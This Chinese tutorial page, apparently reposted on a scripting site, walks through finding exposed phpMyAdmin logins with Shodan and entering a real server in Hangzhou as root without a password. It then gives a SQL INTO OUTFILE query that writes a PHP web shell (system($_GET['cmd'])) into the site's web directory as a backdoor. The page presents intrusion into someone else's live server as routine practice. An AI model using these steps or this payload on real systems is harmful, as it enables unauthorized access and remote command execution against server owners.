• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    phpMyAdmin通过密码漏洞留后门文件

    经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

    下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

    祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

    phpMyAdmin

    先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

    地址已手动打码。

    http://121.***.*.219:80/

    登陆成功(root 权限)。

    接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

    SELECT "?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

    点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

    总结

    以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对脚本之家的支持。如果你想了解更多相关内容请查看下面相关链接

    您可能感兴趣的文章:
    • PHP中的变量覆盖漏洞深入解析
    • PHP网站常见安全漏洞,及相应防范措施总结
    • phpcmsv9.0任意文件上传漏洞解析
    • PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
    • 由php中字符offset特征造成的绕过漏洞详解
    • PHP-CGI远程代码执行漏洞分析与防范
    • 你不知道的文件上传漏洞php代码分析
    • PHP序列化/对象注入漏洞分析
    • PHP常见漏洞攻击分析
    • PHP编程中的常见漏洞和代码实例
    • 详解各种PHP函数漏洞
    上一篇:ThinkPHP5 的简单搭建和使用详解
    下一篇:关于PHP虚拟主机概念及如何选择稳定的PHP虚拟主机
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    phpMyAdmin通过密码漏洞留后门文件 phpMyAdmin,通过,密码,漏洞,